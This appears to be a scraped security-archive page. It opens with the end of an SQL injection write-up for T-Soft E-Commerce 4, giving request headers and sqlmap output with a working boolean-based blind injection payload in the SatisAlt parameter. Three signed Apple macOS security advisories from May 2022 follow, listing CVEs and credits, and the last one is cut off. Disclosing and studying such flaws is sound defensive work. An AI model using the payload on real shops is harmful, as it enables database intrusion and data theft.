yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Sec-Ch-Ua-Platform: "Linux"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://domain.com/srv/admin/products/products-v2/indexAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9=============> RESULTS OF THE SQLMAP <==========================Parameter: SatisAlt (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20---back-end DBMS: MySQL 5available databases [2]:[*] d25082_db[*] information_schema[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable

T-Soft E-Commerce 4 SQL Injection

Apple Security Advisory 2022-05-16-4 - Security Update 2022-004 Catalina addresses bypass, code execution, denial of service, integer overflow, out of bounds access, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-4 Security Update 2022-004 Catalina

Security Update 2022-004 Catalina addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213255.

apache  
Available for: macOS Catalina  
Impact: Multiple issues in apache  
Description: Multiple issues were addressed by updating apache to  
version 2.4.53.  
CVE-2021-44224  
CVE-2021-44790  
CVE-2022-22719  
CVE-2022-22720  
CVE-2022-22721

AppKit  
Available for: macOS Catalina  
Impact: A malicious application may be able to gain root privileges  
Description: A logic issue was addressed with improved validation.  
CVE-2022-22665: Lockheed Martin Red Team

AppleGraphicsControl  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

AppleScript  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2022-26697: Qi Sun and Robert Ai of Trend Micro

AppleScript  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2022-26698: Qi Sun of Trend Micro

CoreTypes  
Available for: macOS Catalina  
Impact: A malicious application may bypass Gatekeeper checks  
Description: This issue was addressed with improved checks to prevent  
unauthorized actions.  
CVE-2022-22663: Arsenii Kostromin (0x3c3e)

CVMS  
Available for: macOS Catalina  
Impact: A malicious application may be able to gain root privileges  
Description: A memory initialization issue was addressed.  
CVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori  
CVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori

DriverKit  
Available for: macOS Catalina  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

Graphics Drivers  
Available for: macOS Catalina  
Impact: A local user may be able to read kernel memory  
Description: An out-of-bounds read issue existed that led to the  
disclosure of kernel memory. This was addressed with improved input  
validation.  
CVE-2022-22674: an anonymous researcher

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26720: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26770: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26756: Jack Dates of RET2 Systems, Inc

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26769: Antonio Zekic (@antoniozekic)

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro  
Zero Day Initiative

Kernel  
Available for: macOS Catalina  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs  
(@starlabs_sg)

Kernel  
Available for: macOS Catalina  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26757: Ned Williamson of Google Project Zero

libresolv  
Available for: macOS Catalina  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2022-26775: Max Shavrick (@_mxms) of the Google Security Team

LibreSSL  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: A denial of service issue was addressed with improved  
input validation.  
CVE-2022-0778

libxml2  
Available for: macOS Catalina  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-23308

OpenSSL  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: This issue was addressed with improved checks.  
CVE-2022-0778

PackageKit  
Available for: macOS Catalina  
Impact: A malicious application may be able to modify protected parts  
of the file system  
Description: This issue was addressed with improved entitlements.  
CVE-2022-26727: Mickey Jin (@patch1t)

Printing  
Available for: macOS Catalina  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26746: @gorelics

Security  
Available for: macOS Catalina  
Impact: A malicious app may be able to bypass signature validation  
Description: A certificate parsing issue was addressed with improved  
checks.  
CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

SMB  
Available for: macOS Catalina  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26715: Peter Nguyễn Vũ Hoàng of STAR Labs

SoftwareUpdate  
Available for: macOS Catalina  
Impact: A malicious application may be able to access restricted  
files  
Description: This issue was addressed with improved entitlements.  
CVE-2022-26728: Mickey Jin (@patch1t)

TCC  
Available for: macOS Catalina  
Impact: An app may be able to capture a user's screen  
Description: This issue was addressed with improved checks.  
CVE-2022-26726: an anonymous researcher

Tcl  
Available for: macOS Catalina  
Impact: A malicious application may be able to break out of its  
sandbox  
Description: This issue was addressed with improved environment  
sanitization.  
CVE-2022-26755: Arsenii Kostromin (0x3c3e)

WebKit  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted mail message may lead to  
running arbitrary javascript  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2022-22589: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu  
of Palo Alto Networks (paloaltonetworks.com)

Wi-Fi  
Available for: macOS Catalina  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
memory handling.  
CVE-2022-26761: Wang Yu of Cyberserval

zip  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted file may lead to a denial of  
service  
Description: A denial of service issue was addressed with improved  
state handling.  
CVE-2022-0530

zlib  
Available for: macOS Catalina  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2018-25032: Tavis Ormandy

zsh  
Available for: macOS Catalina  
Impact: A remote attacker may be able to cause arbitrary code  
execution  
Description: This issue was addressed by updating to zsh version  
5.8.1.  
CVE-2021-45444

Additional recognition

PackageKit  
We would like to acknowledge Mickey Jin (@patch1t) of Trend Micro for  
their assistance.

Security Update 2022-004 Catalina may be obtained from the Mac App  
Store or Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TYACgkQeC9qKD1p  
rhjgGRAAggg84uE4zYtBHmo5Qz45wlY/+FT7bSyCyo2Ta0m3JQmm26UiS9ZzXlD0  
58jCo/ti+gH/gqwU05SnaG88pSMT6VKaDDnmw8WcrPtbl6NN6JX8vaZLFLoGO0dB  
rjwap7ulcLe7/HM8kCz3qqjKj4fusxckCjmm5yBMtuMklq7i51vzkT/+ws00ALcH  
4S821CqIJlS2RIho/M/pih5A/H1Onw/nzKc7VOWjWMmmwoV+oiL4gMPE9kyIAJFQ  
NcZO7s70Qp9N5Z0VGIkD5HkAntEqYGNKJuCQUrHS0fHFUxVrQcuBbbSiv7vwnOT0  
NVcFKBQWJtfcqmtcDF8mVi2ocqUh7So6AXhZGZtL3CrVfNMgTcjq6y5XwzXMgwlm  
ezMX73MnV91QuGp6KVZEmoFNlJ2dhKcJ0fYAhhW9DJqvJ1u5xIkQrUkK/ERLnWpE  
9DIapT8uUbb9Zgez/tS9szv5jHhKtOoPbprju7d7LHw7XMFCVKbUvx745dFZx0AG  
PLsJZQNsQZJIK8QdcLA50KrlyjR2ts4nUsKj07I6LR4wUmcaj+goXYq4Nh4WLnoF  
x1AXD5ztdYlhqMcTAnuAbUYfuki0uzSy0p7wBiTknFwKMZNIaiToo64BES+7Iu1i  
vrB9SdtTSQCMXgPZX1Al1e2F/K2ubovrGU9geAEwLMq3AKudI4g=  
=JBHs  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-4

Apple Security Advisory 2022-05-16-3 - macOS Big Sur 11.6.6 addresses bypass, code execution, denial of service, out of bounds access, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-3 macOS Big Sur 11.6.6

macOS Big Sur 11.6.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213256.

apache  
Available for: macOS Big Sur  
Impact: Multiple issues in apache  
Description: Multiple issues were addressed by updating apache to  
version 2.4.53.  
CVE-2021-44224  
CVE-2021-44790  
CVE-2022-22719  
CVE-2022-22720  
CVE-2022-22721

AppKit  
Available for: macOS Big Sur  
Impact: A malicious application may be able to gain root privileges  
Description: A logic issue was addressed with improved validation.  
CVE-2022-22665: Lockheed Martin Red Team

AppleAVD  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges. Apple is aware of a report that this issue may  
have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-22675: an anonymous researcher

AppleGraphicsControl  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

AppleScript  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-26698: Qi Sun of Trend Micro

AppleScript  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26697: Qi Sun and Robert Ai of Trend Micro

CoreTypes  
Available for: macOS Big Sur  
Impact: A malicious application may bypass Gatekeeper checks  
Description: This issue was addressed with improved checks to prevent  
unauthorized actions.  
CVE-2022-22663: Arsenii Kostromin (0x3c3e)

CVMS  
Available for: macOS Big Sur  
Impact: A malicious application may be able to gain root privileges  
Description: A memory initialization issue was addressed.  
CVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori  
CVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori

DriverKit  
Available for: macOS Big Sur  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

Graphics Drivers  
Available for: macOS Big Sur  
Impact: A local user may be able to read kernel memory  
Description: An out-of-bounds read issue existed that led to the  
disclosure of kernel memory. This was addressed with improved input  
validation.  
CVE-2022-22674: an anonymous researcher

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26720: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26770: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26756: Jack Dates of RET2 Systems, Inc

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26769: Antonio Zekic (@antoniozekic)

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro  
Zero Day Initiative

IOMobileFrameBuffer  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26768: an anonymous researcher

Kernel  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs  
(@starlabs_sg)

Kernel  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26757: Ned Williamson of Google Project Zero

LaunchServices  
Available for: macOS Big Sur  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: The issue was addressed with additional permissions  
checks.  
CVE-2022-26767: Wojciech Reguła (@_r3ggi) of SecuRing

LaunchServices  
Available for: macOS Big Sur  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: An access issue was addressed with additional sandbox  
restrictions on third-party applications.  
CVE-2022-26706: Arsenii Kostromin (0x3c3e)

libresolv  
Available for: macOS Big Sur  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-26776: Zubair Ashraf of Crowdstrike, Max Shavrick (@_mxms)  
of the Google Security Team

LibreSSL  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: A denial of service issue was addressed with improved  
input validation.  
CVE-2022-0778

libxml2  
Available for: macOS Big Sur  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-23308

OpenSSL  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: This issue was addressed with improved checks.  
CVE-2022-0778

PackageKit  
Available for: macOS Big Sur  
Impact: A malicious application may be able to modify protected parts  
of the file system  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26712: Mickey Jin (@patch1t)

Printing  
Available for: macOS Big Sur  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26746: @gorelics

Security  
Available for: macOS Big Sur  
Impact: A malicious app may be able to bypass signature validation  
Description: A certificate parsing issue was addressed with improved  
checks.  
CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

SMB  
Available for: macOS Big Sur  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26718: Peter Nguyễn Vũ Hoàng of STAR Labs

SMB  
Available for: macOS Big Sur  
Impact: Mounting a maliciously crafted Samba network share may lead  
to arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26723: Felix Poulin-Belanger

SMB  
Available for: macOS Big Sur  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26715: Peter Nguyễn Vũ Hoàng of STAR Labs

SoftwareUpdate  
Available for: macOS Big Sur  
Impact: A malicious application may be able to access restricted  
files  
Description: This issue was addressed with improved entitlements.  
CVE-2022-26728: Mickey Jin (@patch1t)

TCC  
Available for: macOS Big Sur  
Impact: An app may be able to capture a user's screen  
Description: This issue was addressed with improved checks.  
CVE-2022-26726: an anonymous researcher

Tcl  
Available for: macOS Big Sur  
Impact: A malicious application may be able to break out of its  
sandbox  
Description: This issue was addressed with improved environment  
sanitization.  
CVE-2022-26755: Arsenii Kostromin (0x3c3e)

Vim  
Available for: macOS Big Sur  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating Vim.  
CVE-2021-4136  
CVE-2021-4166  
CVE-2021-4173  
CVE-2021-4187  
CVE-2021-4192  
CVE-2021-4193  
CVE-2021-46059  
CVE-2022-0128

WebKit  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted mail message may lead to  
running arbitrary javascript  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2022-22589: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu  
of Palo Alto Networks (paloaltonetworks.com)

Wi-Fi  
Available for: macOS Big Sur  
Impact: A malicious application may disclose restricted memory  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26745: an anonymous researcher

Wi-Fi  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
memory handling.  
CVE-2022-26761: Wang Yu of Cyberserval

zip  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted file may lead to a denial of  
service  
Description: A denial of service issue was addressed with improved  
state handling.  
CVE-2022-0530

zlib  
Available for: macOS Big Sur  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2018-25032: Tavis Ormandy

zsh  
Available for: macOS Big Sur  
Impact: A remote attacker may be able to cause arbitrary code  
execution  
Description: This issue was addressed by updating to zsh version  
5.8.1.  
CVE-2021-45444

Additional recognition

Bluetooth  
We would like to acknowledge Jann Horn of Project Zero for their  
assistance.

macOS Big Sur 11.6.6 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TUACgkQeC9qKD1p  
rhgJBg/9HpPp6P2OtFdYHigfaoga/3szMAjXC650MlC2rF1lXyTRVsO54eupz4er  
K8Iud3+YnDVTUKkadftWt2XdxAADGtfEFhJW584RtnWjeli+XtGEjQ8jD1/MNPJW  
qtnrOh2pYG9SxolKDofhiecbYxIGppRKSDRFl0/3VGFed2FIpiRDunlttHBEhHu/  
vZVSFzMrNbGvhju+ZCdwFLKXOgB851aRSeo9Xkt63tSGiee7rLmVAINyFbbPwcVP  
yXwMvn0TNodCBn0wBWD0+iQ3UXIDIYSPaM1Z0BQxVraEhK3Owro3JKgqNbWswMvj  
SY0KUulbAPs3aOeyz1BI70npYA3+Qwd+bk2hxbzbU/AxvxCrsEk04QfxLYqvj0mR  
VZYPcup2KAAkiTeekQ5X739r8NAyaaI+bp7FllFv/Z2jVW9kGgNIFr46R05MD9NF  
aC1JAZtJ4VWbMEGHnHAMrOgdGaHpryvzl2BjUXRgW27vIq5uF5YiNcpjS2BezTFc  
R2ojiMNRB33Y44LlH7Zv3gHm4bE3+NzcGeWvBzwOsHznk9Jiv6x2eBUxkttMlPyO  
zymQMONQN3bktSMT8JnmJ8rlEgISONd7NeTEzuhlGIWaWNAFmmBoPnBiPk+yC3n4  
d22yFs6DLp2pJ+0zOWmTcqt1xYng05Jwj4F0KT49w0TO9Up79+o=  
=rtPl  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-3

Apple Security Advisory 2022-05-16-2 - macOS Monterey 12.4 addresses buffer overflow, bypass, code execution, denial of service, integer overflow, out of bounds access, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-2 macOS Monterey 12.4

macOS Monterey 12.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213257.

AMD  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26772: an anonymous researcher

AMD  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
CVE-2022-26741: ABC Research s.r.o  
CVE-2022-26742: ABC Research s.r.o  
CVE-2022-26749: ABC Research s.r.o  
CVE-2022-26750: ABC Research s.r.o  
CVE-2022-26752: ABC Research s.r.o  
CVE-2022-26753: ABC Research s.r.o  
CVE-2022-26754: ABC Research s.r.o

apache  
Available for: macOS Monterey  
Impact: Multiple issues in apache  
Description: Multiple issues were addressed by updating apache to  
version 2.4.53.  
CVE-2021-44224  
CVE-2021-44790  
CVE-2022-22719  
CVE-2022-22720  
CVE-2022-22721

AppleGraphicsControl  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

AppleScript  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26697: Qi Sun and Robert Ai of Trend Micro

AppleScript  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-26698: Qi Sun of Trend Micro

AVEVideoEncoder  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26736: an anonymous researcher  
CVE-2022-26737: an anonymous researcher  
CVE-2022-26738: an anonymous researcher  
CVE-2022-26739: an anonymous researcher  
CVE-2022-26740: an anonymous researcher

Contacts  
Available for: macOS Monterey  
Impact: A plug-in may be able to inherit the application's  
permissions and access user data  
Description: This issue was addressed with improved checks.  
CVE-2022-26694: Wojciech Reguła (@_r3ggi) of SecuRing

CVMS  
Available for: macOS Monterey  
Impact: A malicious application may be able to gain root privileges  
Description: A memory initialization issue was addressed.  
CVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori  
CVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori

DriverKit  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

ImageIO  
Available for: macOS Monterey  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: An integer overflow issue was addressed with improved  
input validation.  
CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend  
Micro Zero Day Initiative

ImageIO  
Available for: macOS Monterey  
Impact: Photo location information may persist after it is removed  
with Preview Inspector  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-26725: Andrew Williams and Avi Drissman of Google

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26720: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26769: Antonio Zekic (@antoniozekic)

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26770: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro  
Zero Day Initiative

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26756: Jack Dates of RET2 Systems, Inc

IOKit  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A race condition was addressed with improved locking.  
CVE-2022-26701: chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab

IOMobileFrameBuffer  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26768: an anonymous researcher

Kernel  
Available for: macOS Monterey  
Impact: An attacker that has already achieved code execution in macOS  
Recovery may be able to escalate to kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26743: Jordy Zomer (@pwningsystems)

Kernel  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs  
(@starlabs_sg)

Kernel  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26757: Ned Williamson of Google Project Zero

Kernel  
Available for: macOS Monterey  
Impact: An attacker that has already achieved kernel code execution  
may be able to bypass kernel memory mitigations  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: macOS Monterey  
Impact: A malicious attacker with arbitrary read and write capability  
may be able to bypass Pointer Authentication  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

LaunchServices  
Available for: macOS Monterey  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: An access issue was addressed with additional sandbox  
restrictions on third-party applications.  
CVE-2022-26706: Arsenii Kostromin (0x3c3e)

LaunchServices  
Available for: macOS Monterey  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: The issue was addressed with additional permissions  
checks.  
CVE-2022-26767: Wojciech Reguła (@_r3ggi) of SecuRing

libresolv  
Available for: macOS Monterey  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-26776: Zubair Ashraf of Crowdstrike, Max Shavrick (@_mxms)  
of the Google Security Team  
CVE-2022-26708: Max Shavrick (@_mxms) of the Google Security Team

libresolv  
Available for: macOS Monterey  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2022-26775: Max Shavrick (@_mxms) of the Google Security Team

LibreSSL  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: A denial of service issue was addressed with improved  
input validation.  
CVE-2022-0778

libxml2  
Available for: macOS Monterey  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-23308

OpenSSL  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted certificate may lead to a  
